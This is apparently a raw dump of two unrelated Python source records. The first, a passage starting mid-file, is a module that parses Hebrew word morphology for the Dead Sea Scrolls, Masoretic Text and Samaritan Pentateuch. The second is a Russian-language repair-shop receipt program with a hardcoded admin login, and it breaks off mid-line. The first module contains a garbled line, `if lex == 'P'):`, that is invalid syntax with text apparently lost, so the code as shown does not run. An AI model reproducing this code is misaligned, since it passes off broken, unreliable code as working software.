self.cor_signs,\n stem=self.stem,\n prs_cons=self.prs,\n 
nme_cons=self.nme,\n hloc=self.hloc,\n heb_g_cons=self.heb_g_cons,\n g_pfm=self.g_pfm,\n g_vbs=self.g_vbs,\n g_vbe=self.g_vbe\n )\n\n def get_number(self):\n number = F.nu.v(self.tf_id)\n if number in {'unknown', 'NA'}:\n return None\n return number\n\n def get_gender(self):\n gender = F.gn.v(self.tf_id)\n if gender == 'NA':\n return None\n return gender\n\n def get_state(self):\n state = F.st.v(self.tf_id)\n if state == 'NA':\n return None\n return state\n\n def get_he_locale(self):\n if F.uvf.v(self.tf_id) == 'H':\n return 'H'\n return ''\n\n def get_prs(self):\n suff = F.g_prs.v(self.tf_id)\n # Cases like >DNJ in Genesis 19:2 (masc plural with prs)\n if suff == '+':\n suff = 'J'\n prs_cons = ''.join([ch for ch in suff if ch in self.prs_chars])\n return prs_cons\n\n def get_stem(self):\n stem = ''.join([ch for ch in F.g_lex.v(self.tf_id)\n if ch in self.consonants])\n if self.lexeme in relevant_wt_words and self.number == 'sg' \\\n and not stem.endswith('T') and self.nme.startswith('T'):\n stem += 'T'\n self.nme = self.nme.lstrip('T')\n elif self.lexeme in fem_ending_numbers:\n stem = stem[:-1]\n self.nme = 'T' + self.nme\n return stem\n\n def get_nme(self):\n g_nme = F.g_nme.v(self.tf_id)\n prs = F.g_prs.v(self.tf_id)\n # According to BHSA H is not nominal ending, but we strip it ad hoc.\n if self.lexeme == 'NGH/' and self.glyphs == 'NGH':\n g_nme = 'H'\n self.stem = 'NG'\n # Cases like >DNJ in Genesis 19:2 (masc plural with prs), decision: no nme, but prs\n if prs == '+':\n g_nme = g_nme.rstrip('J')\n nme_cons = ''.join([ch for ch in g_nme if ch in self.consonants])\n\n return nme_cons\n\n def get_vbs(self):\n vbs_cons = ''.join([ch for ch in F.g_vbs.v(self.tf_id) if ch in self.consonants])\n return vbs_cons\n\n def get_pfm(self):\n pfm_cons = ''.join([ch for ch in F.g_pfm.v(self.tf_id) if ch in self.consonants])\n return pfm_cons\n\n def get_vbe(self):\n vbe_cons = ''.join([ch for ch in F.g_vbe.v(self.tf_id) if ch in self.consonants])\n return vbe_cons\n\n\ndef parse_nme_dss(stem, lex, state, nu, gn, sp, prs):\n \"\"\"\n :param stem: initial stem (needs further parsing)\n :param lex: lexeme\n :param state: state a or c\n :param nu: number\n :param gn: gender\n :param sp: part of speech\n :param prs: pronominal suffix\n :return: stem and nme\n \"\"\"\n nme = ''\n lex_no_special_signs = lex.strip('/').strip('=')\n\n if lex in j_lexemes:\n if prs and stem.endswith('JJ') and nu == 'pl':\n stem = stem.removesuffix('J')\n nme += 'J'\n else:\n if prs and stem.endswith('J') and nu == 'pl':\n stem = stem.removesuffix('J')\n nme += 'J'\n\n if sp == 'adjv' and len(lex) > 1 and stem.endswith('H') and lex_no_special_signs[-1] != 'H':\n stem = stem.removesuffix('H')\n nme += 'H'\n elif sp == 'adjv' and len(lex) > 1 and stem.endswith('T') and lex_no_special_signs[-1] != 'T' and nu == 'sg':\n stem = stem.removesuffix('T')\n nme += 'T'\n elif sp == 'adjv' and len(lex) > 1 and stem.endswith('TJ') and lex_no_special_signs[-2:] != 'TJ' and nu == 'sg':\n stem = stem.removesuffix('TJ')\n nme += 'TJ'\n elif sp == 'adjv' and lex_no_special_signs[-1] == 'J' and len(lex) > 1 and stem.endswith('JM'):\n stem = stem.removesuffix('JM')\n nme += 'JM'\n elif sp == 'adjv' and lex_no_special_signs[-1] == 'J' and len(lex) > 1 and stem.endswith('JN'):\n stem = stem.removesuffix('JN')\n nme += 'JN'\n elif sp == 'adjv' and lex_no_special_signs[-1] == 'J' and len(lex) > 1 and stem.endswith('WT'):\n stem = stem.removesuffix('WT')\n nme += 'WT'\n elif sp == 'adjv' and lex_no_special_signs[-1] == 'J' and len(lex) > 1 and 
stem.endswith('T'):\n stem = stem.removesuffix('T')\n nme += 'T'\n\n if (stem.endswith('J') and state == 'c' and nu in {'du', 'pl'} and lex not in j_lexemes) or \\\n (stem.endswith('J') and sp == 'prep'):\n stem = stem.removesuffix('J')\n nme += 'J'\n elif stem.endswith('W') and sp == 'prep':\n stem = stem.removesuffix('W')\n nme += 'W'\n elif lex in j_lexemes and stem.endswith('JJM') and len(stem) > 3:\n stem = stem.removesuffix('JM')\n nme = 'JM' + nme\n elif lex in j_lexemes and stem.endswith('JM') and len(stem) > 2:\n stem = stem.removesuffix('M')\n nme = 'M' + nme\n elif lex not in j_lexemes and stem.endswith('JM') and nu in {'du', 'pl'} and len(stem) > 2:\n stem = stem.removesuffix('JM')\n nme = 'JM' + nme\n elif lex not in j_lexemes and stem.endswith('M') and nu in {'du', 'pl'} and len(stem) > 2 and (lex_no_special_signs[-1] != 'M' or lex == '>LHJM/'):\n stem = stem.removesuffix('M')\n nme = 'M' + nme\n\n if stem.endswith('WT') and nu == 'pl':\n stem = stem.removesuffix('WT')\n nme = 'WT' + nme\n if stem.endswith('WTJ') and nu == 'pl':\n stem = stem.removesuffix('WTJ')\n nme = 'WTJ' + nme\n elif stem.endswith('T') and nu == 'pl' and gn == 'f':\n stem = stem.removesuffix('T')\n nme = 'T' + nme\n\n if lex_no_special_signs[-1] == 'H' and nu == 'sg':\n if stem.endswith('TJ'):\n stem = stem.removesuffix('TJ')\n nme = 'TJ' + nme\n elif stem[-1] == 'T':\n stem = stem.removesuffix('T')\n nme = 'T' + nme\n elif stem[-1] == 'H' and lex != '>LWH/':\n stem = stem.removesuffix('H')\n nme = 'H' + nme\n\n # Ugly ad hoc solution for Jer 17:18 in 4Q70. Better solution?\n if lex == 'CBRWN/' and stem == 'CBRWNM':\n stem = 'CBRWN'\n nme = 'M'\n\n # Aramaic plural\n if stem.endswith('JN') and gn == 'm' and nu == 'pl' and not nme:\n stem = stem[:-2]\n nme = 'JN'\n\n # Ugly hardcoded solution for H/> exchange\n if lex in {'DBWRH/', 'GBWRH/', 'PLJVH/', 'MNWSH/', 'MBWSH/', 'PH/', 'DWD=/'} and stem.endswith('>'):\n stem = stem[:-1]\n nme = '>' + nme\n\n if lex in fem_ending_numbers:\n if stem.endswith('T'):\n stem = stem[:-1]\n nme = 'T' + nme\n\n if lex in fem_end_words:\n if nu == 'pl' and stem.endswith('T'):\n stem = stem[:-1]\n nme = 'T' + nme\n elif nu == 'pl' and stem.endswith('WT'):\n stem = stem[:-2]\n nme = 'WT' + nme\n\n if lex == 'CWCN/' and stem.endswith('H'):\n stem = stem.rstrip('H')\n nme += 'H'\n\n if lex == 'CLC/' and stem.endswith('H'):\n stem = stem.rstrip('H')\n nme = 'H' + nme\n\n if lex == 'GDL/' and stem.endswith('H'):\n stem = stem.rstrip('H')\n nme = 'H' + nme\n\n if lex == 'XV>/' and stem.endswith('H'):\n stem = stem.rstrip('H')\n nme = 'H' + nme\n\n if lex == 'P'):\n stem = stem.rstrip('>')\n nme = '>' + nme\n\n return stem, nme\n\n\nclass DSSWordProcessor:\n \"\"\"\"\"\"\n def __init__(self, tf_id):\n self.tf_id = tf_id\n self.book = Fdss.book_etcbc.v(tf_id)\n self.chapter_num = Fdss.chapter.v(tf_id)\n self.verse_num = Fdss.verse.v(tf_id)\n self.lexeme = Fdss.lex_etcbc.v(tf_id)\n self.glyphs = None\n self.hloc = self.get_he_locale()\n self.prs = ''\n self.nme = ''\n self.sp = Fdss.sp_etcbc.v(tf_id)\n self.number = self.get_number()\n self.person = Fdss.ps_etcbc.v(tf_id)\n self.gender = self.get_gender()\n self.state = self.get_state()\n self.vs = Fdss.vs_etcbc.v(tf_id)\n self.vt = Fdss.vt_etcbc.v(tf_id)\n self.lang = Fdss.lang_etcbc.v(tf_id)\n self.rec_signs = None\n self.cor_signs = None\n self.heb_g_cons = ''\n if Fdss.glyphe.v(tf_id):\n self.glyphs = self.preprocess_text()\n self.rec_signs = self.get_reconstructed_signs()\n self.cor_signs = self.get_corrected_signs()\n 
self.heb_text_adder = HebrewTextAdder(self.glyphs)\n            self.heb_g_cons = self.heb_text_adder.get_hebrew_g_cons()\n        self.stem = self.glyphs\n        if self.stem:\n            self.stem = self.stem.removesuffix(self.hloc).removesuffix(self.prs)\n        if self.lexeme:\n            self.parse_nme()\n        if Fdss.morpho.v(self.tf_id):\n            if self.sp == 'verb' and Fdss.morpho.v(self.tf_id)[-1] == 'h':\n                self.stem = self.stem.rstrip('H')\n        self.g_pfm = self.get_pfm()  # So far only for hifil triliteral!!\n        self.g_vbs = self.get_vbs()  # So far only for hifil triliteral!!\n        self.g_vbe = self.get_vbe()\n        self.prefix = self.parse_prefix_g_cons_dss()\n\n    def create_word(self):\n\n        return Word(self.tf_id,\n                    self.book,\n                    self.chapter_num,\n                    self.verse_num,\n                    self.glyphs,\n                    self.lexeme,\n                    self.sp,\n                    self.person,\n                    self.number,\n                    self.gender,\n                    self.state,\n                    self.vs,\n                    self.vt,\n                    self.lang,\n                    self.rec_signs,\n                    self.cor_signs,\n                    prs_cons=self.prs,\n                    nme_cons=self.nme,\n                    hloc=self.hloc,\n                    heb_g_cons=self.heb_g_cons,\n                    prefix=self.prefix,\n                    stem=self.stem,\n                    g_pfm=self.g_pfm,\n                    g_vbs=self.g_vbs,\n                    g_vbe=self.g_vbe\n                    )\n\n    def preprocess_text(self):\n        \"\"\"\n        Remove spaces that occur in data (and also in manuscript!).\n        \"\"\"\n        glyphs = Fdss.glyphe.v(self.tf_id)\n        if glyphs:\n            glyphs = ''.join(glyphs.split())\n            glyphs = self.disambiguate_sin_shin(glyphs)\n            glyphs = self.replace_final_characters(glyphs)\n            glyphs = self.get_pronominal_suffix(glyphs)\n\n        return glyphs\n\n    def get_reconstructed_signs(self):\n        \"\"\"\n        Returns string with indication of which signs are reconstructed (\"r\")\n        and which signs are not reconstructed (\"n\").\n        \"\"\"\n        signs = Ldss.d(self.tf_id, 'sign')\n        return ''.join(['r' if Fdss.rec.v(s) == 1 else 'n' for s in signs if Fdss.type.v(s) == 'cons'])\n\n    def get_corrected_signs(self):\n        \"\"\"\n        Returns string with indication of which signs are corrected:\n        'c' for a sign corrected by a modern editor (cor == 1), 'n' otherwise.\n        The underlying cor feature distinguishes:\n        1: corrected by a modern editor\n        2: corrected by an ancient editor\n        3: corrected by an ancient editor, supralinear\n        \"\"\"\n        signs = Ldss.d(self.tf_id, 'sign')\n        return ''.join(['c' if Fdss.cor.v(s) == 1 else 'n' for s in signs if Fdss.type.v(s) == 'cons'])\n\n    def disambiguate_sin_shin(self, glyphs):\n        \"\"\"\n        The consonant '#' is used for both 'C' and 'F'. We check in the lexeme\n        to which of the two alternatives it should be converted. This approach is crude,\n        but works generally well. 
There is only one word with both F and C in the lexeme:\n >RTX##T> >AR:T.AX:CAF:T.:> in 4Q117\n \"\"\"\n if '#' in glyphs:\n # hardcode the single word with both 'C' and 'F' in the lexeme.\n if glyphs == '>RTX##T>':\n glyphs = '>RTXCFT>'\n\n elif 'F' in self.lexeme:\n glyphs = glyphs.replace('#', 'F')\n else:\n glyphs = glyphs.replace('#', 'C')\n\n return glyphs\n\n @staticmethod\n def replace_final_characters(glyphs):\n \"\"\"\n - Replaces space '\\xa0' with ' '.\n - Replaces special final characters with ordinary characters in ETCBC transcription.\n \"\"\"\n glyphs = glyphs.replace(u'\\xa0', u' ') \\\n .replace('k', 'K') \\\n .replace('n', 'N') \\\n .replace('m', 'M') \\\n .replace('y', 'Y') \\\n .replace('p', 'P')\n return glyphs\n\n def get_he_locale(self):\n \"\"\"\n Retrieve he locale from feature uvf_etcbc.\n\n \"\"\"\n if Fdss.uvf_etcbc.v(self.tf_id) == 'H':\n return 'H'\n return ''\n\n def get_pronominal_suffix(self, glyphs):\n \"\"\"\n Check for ' in glyphs and check if it is a he locale.\n If not, then it is a pronominal suffix.\n \"\"\"\n if \"'\" in glyphs and not self.hloc:\n self.prs = glyphs.split(\"'\")[1]\n\n glyphs = glyphs.replace(\"'\", '')\n return glyphs\n\n def parse_nme(self):\n self.stem, self.nme = parse_nme_dss(self.stem, self.lexeme, self.state, self.number, self.gender, self.sp, self.prs)\n\n def get_number(self):\n \"\"\"\n Number values are {'NA', 'du', 'pl', 'sg', 'unknown'}.\n We remove the unknowns.\n \"\"\"\n number = Fdss.nu_etcbc.v(self.tf_id)\n if number == 'unknown':\n return None\n return number\n\n def get_gender(self):\n gender = Fdss.gn_etcbc.v(self.tf_id)\n if gender not in {'m', 'f'}:\n return None\n return gender\n\n def get_state(self):\n state = Fdss.st.v(self.tf_id)\n if not state:\n return None\n return state\n\n def get_vbs(self):\n \"\"\"So far only implemented for hiphil.\n Check if relevant tense has valid value and glyphs start with H.\n Returns H if present and adapts stem accordingly.\n \"\"\"\n if self.vs == 'hif' and self.vt in {'perf', 'impv', 'infa', 'infc'} and self.lexeme and self.glyphs:\n if self.lexeme[0] != 'H' and self.glyphs[0] == 'H':\n self.stem = self.stem[1:]\n return 'H'\n else:\n return ''\n\n def get_pfm(self):\n \"\"\"Only implemented for hiphil.\"\"\"\n if self.vs == 'hif' and self.lexeme and self.glyphs:\n if self.vt == 'ptca' and self.glyphs[0] == 'M':\n self.stem = self.stem[1:]\n return 'M'\n elif self.vt in {'impf', 'wayq'}:\n if self.person in {'p2', 'p3'} and self.glyphs[0] == 'T':\n self.stem = self.stem[1:]\n return 'T'\n elif self.person == 'p3' and self.glyphs[0] == 'J':\n self.stem = self.stem[1:]\n return 'J'\n elif self.person == 'p1' and self.glyphs[0] in {'>', 'N'}:\n self.stem = self.stem[1:]\n return self.glyphs[0]\n else:\n return ''\n else:\n return ''\n\n def get_vbe(self):\n \"\"\"Only implemented for hiphil.\"\"\"\n perf_dict = {\n ('m', 'sg', 'p3'): '',\n ('m', 'sg', 'p2'): 'T',\n ('f', 'sg', 'p3'): 'H',\n ('f', 'sg', 'p2'): 'T',\n ('unknown', 'sg', 'p1'): 'TJ',\n ('unknown', 'pl', 'p3'): 'W',\n ('m', 'pl', 'p3'): 'W',\n ('m', 'pl', 'p2'): 'TM',\n ('f', 'pl', 'p2'): 'TN',\n ('unknown', 'pl', 'p1'): ''\n }\n\n impf_dict = {\n ('m', 'sg', 'p3'): '',\n ('m', 'sg', 'p2'): '',\n ('f', 'sg', 'p3'): '',\n ('f', 'sg', 'p2'): 'J',\n ('unknown', 'sg', 'p1'): '',\n ('m', 'pl', 'p3'): 'W',\n ('m', 'pl', 'p2'): 'W',\n ('f', 'pl', 'p3'): 'NH',\n ('f', 'pl', 'p2'): 'NH',\n ('unknown', 'pl', 'p1'): ''\n }\n\n impv_dict = {\n ('m', 'sg', 'NA'): '',\n ('f', 'sg', 'NA'): 'J',\n ('m', 'pl', 'NA'): 'W',\n 
('f', 'pl', 'NA'): 'NH',\n        }\n\n        if self.vs == 'hif' and self.lexeme and self.glyphs:\n            if self.book:\n                gn, nu, ps = self.gender, self.number, self.person\n                if gn in {'', None}:\n                    gn = 'unknown'\n\n                if self.vt == 'perf':\n                    vbe = perf_dict[(gn, nu, ps)]\n                    if (gn, nu, ps) == ('unknown', 'pl', 'p3') and self.stem.endswith('J'):\n                        vbe = 'J'  # single case in 1Qisaa, tf_id = 1899343\n                elif self.vt == 'impf':\n                    vbe = impf_dict[(gn, nu, ps)]\n                elif self.vt == 'impv':\n                    vbe = impv_dict[(gn, nu, ps)]\n                    if vbe == 'NH' and self.lexeme[-2] == 'N':\n                        vbe = 'H'\n                else:\n                    vbe = ''\n                if self.stem.endswith(vbe):\n                    # removesuffix, not rstrip: rstrip would strip any trailing run of the characters in vbe\n                    self.stem = self.stem.removesuffix(vbe)\n                    return vbe\n                else:\n                    return ''\n            else:\n                return ''\n        return ''\n\n    def parse_prefix_g_cons_dss(self):\n        prefix = ''\n        previous_word_id = self.tf_id - 1\n        while Fdss.after.v(previous_word_id) is None:\n            prev_word_g_cons = Fdss.g_cons.v(previous_word_id)\n            if prev_word_g_cons is None:\n                prev_word_g_cons = ''\n            prefix = prev_word_g_cons + prefix\n            previous_word_id = previous_word_id - 1\n        return prefix\n\n\nclass SPWordProcessor:\n    \"\"\"\"\"\"\n    def __init__(self, tf_id, sp_word_nodes):\n        self.prs_chars = {'>', 'D', 'H', 'J', 'K', 'M', 'N', 'W'}\n        self.consonants = {'<', '>', 'B', 'C', 'D', 'F', 'G', 'H', 'J', 'K', 'L', 'M',\n                           'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'X', 'Y', 'Z', '#'}\n        self.tf_id = tf_id\n        self.sp_word_nodes = sp_word_nodes\n        self.book = Fsp.book.v(tf_id)\n        self.chapter_num = Fsp.chapter.v(tf_id)\n        self.verse_num = Fsp.verse.v(tf_id)\n        self.lexeme = Fsp.lex.v(tf_id)\n        self.glyphs = Fsp.g_cons.v(tf_id)\n        self.hloc = self.get_he_locale()\n        self.sp = Fsp.sp.v(tf_id)\n        self.number = self.get_number()\n        self.person = Fsp.ps.v(tf_id)\n        self.gender = self.get_gender()\n        self.state = self.get_state()\n        self.vs = None  # Todo: implement verbal stem\n        self.vt = Fsp.vt.v(tf_id)\n        self.lang = Fsp.language.v(tf_id)\n        self.rec_signs = ''.join(['n' for char in self.glyphs])\n        self.cor_signs = ''.join(['n' for char in self.glyphs])\n        self.nme = self.get_nme()\n        self.prs = self.get_prs()\n        self.stem = self.get_stem()\n        self.heb_text_adder = HebrewTextAdder(self.glyphs)\n        self.heb_g_cons = self.heb_text_adder.get_hebrew_g_cons()\n        self.prefix = self.parse_prefix_g_cons_sp()\n\n    def create_word(self):\n\n        return Word(self.tf_id,\n                    self.book,\n                    self.chapter_num,\n                    self.verse_num,\n                    self.glyphs,\n                    self.lexeme,\n                    self.sp,\n                    self.person,\n                    self.number,\n                    self.gender,\n                    self.state,\n                    self.vs,\n                    self.vt,\n                    self.lang,\n                    self.rec_signs,\n                    self.cor_signs,\n                    stem=self.stem,\n                    prs_cons=self.prs,\n                    nme_cons=self.nme,\n                    hloc=self.hloc,\n                    prefix=self.prefix,\n                    heb_g_cons=self.heb_g_cons)\n\n    def get_number(self):\n        number = Fsp.nu.v(self.tf_id)\n        if number in {'unknown', 'NA'}:\n            return None\n        return number\n\n    def get_gender(self):\n        gender = Fsp.gn.v(self.tf_id)\n        if gender == 'NA':\n            return None\n        return gender\n\n    def get_state(self):\n        \"\"\"Not implemented yet\"\"\"\n        return None\n\n    def get_he_locale(self):\n        \"\"\"Not implemented yet\"\"\"\n        h_loc = ''\n        if Fsp.g_uvf.v(self.tf_id) == '~H':\n            h_loc = 'H'\n        return h_loc\n\n    def get_prs(self):\n        suff = Fsp.g_prs.v(self.tf_id)\n        if suff == '+':\n            suff = 'J'\n        prs_cons = ''.join([ch for ch in suff if ch in self.prs_chars])\n        return prs_cons\n\n    def get_stem(self):\n        \"\"\"Not implemented yet\"\"\"\n        stem = Fsp.g_lex.v(self.tf_id)\n        if self.lexeme in relevant_wt_words and self.number == 'sg' \\\n                and not stem.endswith('T') and self.nme.startswith('T'):\n            stem += 'T'\n            self.nme = self.nme.lstrip('T')\n        elif self.lexeme in 
fem_ending_numbers:\n            stem = stem[:-1]\n            self.nme = 'T' + self.nme\n        return stem\n\n    def get_nme(self):\n        nme_cons = ''.join([ch for ch in Fsp.g_nme.v(self.tf_id) if ch in self.consonants])\n        return nme_cons\n\n    def parse_prefix_g_cons_sp(self):\n        prefix = ''\n        previous_word_id = self.tf_id - 1\n\n        while not Fsp.trailer.v(previous_word_id):\n            prev_word_g_cons = Fsp.g_cons.v(previous_word_id)\n            if not prev_word_g_cons:\n                prev_word_g_cons = ''\n            prefix = prev_word_g_cons + prefix\n            previous_word_id = previous_word_id - 1\n            if previous_word_id not in self.sp_word_nodes:\n                break\n        return prefix\n\n\nclass Corpus:\n    \"\"\"\"\"\"\n    def __init__(self, corpus_name):\n        self.corpus_name = corpus_name\n        self.scroll_set = set()\n        self.scroll_verse_set = set()\n\n        self.add_dss()\n        self.add_mt()\n        self.add_sp()\n\n    def add_dss(self):\n        \"\"\"\n        add_dss adds the DSS data to the corpus.\n        It creates Scroll objects,\n        and adds Verse and Word objects to them.\n        \"\"\"\n        for scr in Fdss.otype.s('scroll'):\n            scroll_name = Tdss.scrollName(scr)\n            # Is the if... needed? Check: related to the 11q4 ezekiel/Psalms issue\n            if scroll_name not in self.scroll_set:\n                scroll = Scroll(scroll_name)\n                self.scroll_set.add(scroll_name)\n\n            words = Ldss.d(scr, 'word')\n            for wo in words:\n                word_processor = DSSWordProcessor(wo)\n                dss_word_object = word_processor.create_word()\n                bo, ch, ve = dss_word_object.book, dss_word_object.chapter_num, dss_word_object.verse_num\n\n                if not all([bo, ch, ve]) or ('f' in ch) or (dss_word_object.lex in {None, ''}):\n                    continue\n\n                scroll_verse = (scroll_name, bo, ch, ve)\n                if scroll_verse not in self.scroll_verse_set:\n\n                    verse = Verse(scroll_name, bo, ch, ve)\n                    Scroll.scrolls[scroll_name].verses[(bo, int(ch), int(ve))] = verse\n                    self.scroll_verse_set.add(scroll_verse)\n                Scroll.scrolls[scroll_name].verses[(bo, int(ch), int(ve))].words.append(dss_word_object)\n\n    def add_mt(self):\n        \"\"\"\n        Does the same as add_dss, but for the MT data.\n        \"\"\"\n        scroll = Scroll('MT')\n\n        for b in F.otype.s('book'):\n            verses = L.d(b, 'verse')\n            for v in verses:\n                bo, ch, ve = T.sectionFromNode(v)\n                verse = Verse('MT', bo, ch, ve)\n                scroll.verses[(bo, int(ch), int(ve))] = verse\n                words = L.d(v, 'word')\n                for wo in words:\n                    word_processor = MTWordProcessor(wo)\n                    mt_word_object = word_processor.create_word()\n                    scroll.verses[(bo, int(ch), int(ve))].words.append(mt_word_object)\n\n    def add_sp(self):\n        \"\"\"\n        Adds the Samaritan Pentateuch to the corpus.\n        Note that verse numbers are not converted to integers, because there is a verse '36a' in Genesis.\n        This could become nasty somewhere. 
Todo: find solution for this.\n \"\"\"\n scroll = Scroll('SP')\n sp_word_nodes = set(Fsp.otype.s('word'))\n\n for b in Fsp.otype.s('book'):\n verses = Lsp.d(b, 'verse')\n for v in verses:\n bo, ch, ve = Tsp.sectionFromNode(v)\n verse = Verse('SP', bo, ch, ve)\n scroll.verses[(bo, int(ch), ve)] = verse\n words = Lsp.d(v, 'word')\n for wo in words:\n word_processor = SPWordProcessor(wo, sp_word_nodes)\n sp_word_object = word_processor.create_word()\n scroll.verses[(bo, int(ch), ve)].words.append(sp_word_object)\n","repo_name":"MartijnNaaijer/hebrew_spelling_variation","sub_path":"preprocess_data/src/data_classes.py","file_name":"data_classes.py","file_ext":"py","file_size_in_byte":29509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18456861408","text":"from datetime import timedelta\nimport datetime\nimport random\nimport json\n\nclients = []\nadmin = []\ndate = datetime.date.today()\ndate2 = (date + timedelta(days=random.randint(1, 5))).strftime(\"%d.%m.%Y\")\ndate = date.strftime(\"%d.%m.%Y\")\n\n\nclass Receipt:\n count = 1\n\n def __init__(self, receipt_number, product_type, date_of_receipt, date_of_completion, full_name, status):\n self.receipt_number = receipt_number\n self.product_type = product_type\n self.date_of_receipt = date_of_receipt\n self.date_of_completion = date_of_completion\n self.full_name = full_name\n self.status = status\n Receipt.count += 1\n\n @staticmethod\n def clients_new():\n name = input(\"Введите Ф.И.О\")\n technics = input(\"Выберите, что ремонтируем:\\n\"\n \"1-Телефон\\n\"\n \"2-Нотбук\\n\"\n \"3-Телевизор\\n\")\n\n if technics == '1':\n tel = Telephone(Receipt.count, 'телефон', input(\"Марка телефона\"),\n input(\"Введите операционную систему\"), input(\"Опишите поломку\"),\n date, date2, name, \"ремонтируется\")\n tel.conclusion()\n\n elif technics == '2':\n lap = Laptop(Receipt.count, 'ноутбук', input(\"Марка ноутбука\"),\n input(\"Введите операционную систему\"), input(\"Дата выпуска\"), input(\"Опишите поломку\"),\n date, date2, name, \"ремонтируется\")\n lap.conclusion()\n\n elif technics == '3':\n tv = Tv(Receipt.count, \"телевизор\", input(\"Введите марку телевизора\"),\n input(\"Введите диагональ экрана\"), input(\"Опишите поломку\"), date,\n date2, name, \"ремонтируется\")\n tv.conclusion()\n\n @staticmethod\n def receipt_info():\n step2 = input(\"Поиск: 1-по номеру квитанции\\n\"\n \"2-по ФИО\\n\")\n if step2 == \"1\":\n z = int(input(\"Введите номер квитанции\"))\n for m in clients:\n if z in m:\n print(m)\n break\n else:\n print(\"Клиент с такими данными отсутствует\")\n if step2 == \"2\":\n z1 = input(\"Введите ФИО\")\n for p in clients:\n if z1 in p:\n print(p)\n\n\nclass Admin:\n def __init__(self, login, password, name):\n self.name = name\n self.password = password\n self.login = login\n k = [self.login, self.password, self.name]\n admin.append(k)\n\n @staticmethod\n def admin_action():\n login = input('Ведите логин администратора')\n password1 = input('Введите пароль')\n for v in admin:\n if login in v[0] and password1 in v[1]:\n print(f\"Приветствую Вас: {v[2]}\")\n choice = input(\"Выберите действие:\\n\"\n \"1-панель администратора\\n\"\n \"2-работа с квитанциями\\n\")\n if choice == '1':\n arm = input(\"1-отобразить список всех админов\\n\"\n \"2-удалить админа из списка\\n\"\n \"3-добавить нового админа\\n\")\n if arm == '1':\n for b in admin:\n print(b[2])\n elif arm == '2':\n for q in admin:\n print(q[2])\n all1 = input(\"Введите ФИО кого удалить\")\n for t in 
admin:\n if all1 in t:\n admin.remove(t)\n print(admin)\n\n elif arm == '3':\n Admin(input(\"Введите логин администратора\"), input(\"Введите пароль администратора\"),\n input(\"Введите Ф.И.О. администратора\"))\n print(admin)\n\n elif choice == '2':\n z = int(input(\"Введите номер квитанции\"))\n for g in clients:\n if z in g:\n z1 = input(\"Выберете действие:\\n\"\n \"1-изменить статус ремонта\\n\"\n \"2-изменить дату выполнения ремонта\\n\"\n \"3-посмотреть иформацию о квитанции\\n\")\n if z1 == \"1\":\n for y in clients:\n if z in y:\n y[-1] = input(\"Введите статус\")\n print(y)\n\n elif z1 == \"2\":\n for w in clients:\n if z in w:\n w[6] = input(\"Введите дату завершения ремонта\")\n print(w)\n\n elif z1 == \"3\":\n for e in clients:\n if z in e:\n print(e)\n break\n else:\n print(\"Клиент с такими данными отсутствует\")\n break\n else:\n print(\"Пользователь с таким логином и паролем отсутствует\")\n\n\nclass Telephone(Receipt):\n def __init__(self, receipt_number, product_type, brand, operating_system, breaking,\n date_of_receipt, date_of_completion, full_name, status):\n super().__init__(receipt_number, product_type, date_of_receipt, date_of_completion, full_name, status)\n self.brand = brand\n self.operating_system = operating_system\n self.breaking = breaking\n a = [self.receipt_number, self.product_type, self.brand, self.operating_system, self.breaking,\n self.date_of_receipt, self.date_of_completion, self.full_name, self.status]\n clients.append(a)\n\n def conclusion(self):\n print(\n f\"Номер квитанции:{self.receipt_number}\\n\"\n f\"Тип изделия:{self.product_type}\\n\"\n f\"Марка телефона:{self.brand}\\n\"\n f\"Операционная система :{self.operating_system}\\n\"\n f\"Опиcание поломки :{self.breaking}\\n\"\n f\"Дата приемки:{self.date_of_receipt}\\n\"\n f\"Дата выполнения ремонта:{self.date_of_completion}\\n\"\n f\"Ф.И.О:{self.full_name}\\n\"\n f\"Статус:{self.status}\\n\"\n )\n\n\nclass Laptop(Receipt):\n\n def __init__(self, receipt_number, product_type, brand, operating_system, production_date, breaking,\n date_of_receipt, date_of_completion, full_name, status):\n super().__init__(receipt_number, product_type, date_of_receipt, date_of_completion, full_name, status)\n self.production_date = production_date\n self.brand = brand\n self.operating_system = operating_system\n self.breaking = breaking\n b = [self.receipt_number, self.product_type, self.brand, self.operating_system, self.production_date,\n self.breaking, self.date_of_receipt, self.date_of_completion, self.full_name, self.status]\n clients.append(b)\n\n def conclusion(self):\n print(\n f\"Номер квитанции:{self.receipt_number}\\n\"\n f\"Тип изделия:{self.product_type}\\n\"\n f\"Марка ноутбука:{self.brand}\\n\"\n f\"Операционная система :{self.operating_system}\\n\"\n f\"Год выпуска:{self.production_date}\\n\"\n f\"Опиcание поломки :{self.breaking}\\n\"\n f\"Дата приемки:{self.date_of_receipt}\\n\"\n f\"Дата выполнения ремонта:{self.date_of_completion}\\n\"\n f\"Ф.И.О:{self.full_name}\\n\"\n f\"Статус:{self.status}\\n\"\n )\n\n\nclass Tv(Telephone):\n\n def conclusion(self):\n print(\n f\"Номер квитанции:{self.receipt_number}\\n\"\n f\"Тип изделия:{self.product_type}\\n\"\n f\"Марка телевизора:{self.brand}\\n\"\n f\"Диагональ экрана :{self.operating_system}\\n\"\n f\"Опиcание поломки :{self.breaking}\\n\"\n f\"Дата приемки:{self.date_of_receipt}\\n\"\n f\"Дата выполнения ремонта:{self.date_of_completion}\\n\"\n f\"Ф.И.О:{self.full_name}\\n\"\n f\"Статус:{self.status}\\n\")\n\n\nadmin1 = Admin('11', '222', 'Семен 
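# The admin-deletion branch above mutates the list it is iterating
# (`admin.remove(t)` inside `for t in admin`), which skips the element that
# slides into the removed slot. A standard fix is to rebuild the list:
admins_demo = [['log1', 'pw1', 'Ivan'], ['log2', 'pw2', 'Ivan'],
               ['log3', 'pw3', 'Oleg']]
name_to_drop = 'Ivan'
admins_demo = [row for row in admins_demo if name_to_drop not in row]
print(admins_demo)  # both 'Ivan' rows are gone; remove()-in-loop keeps one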
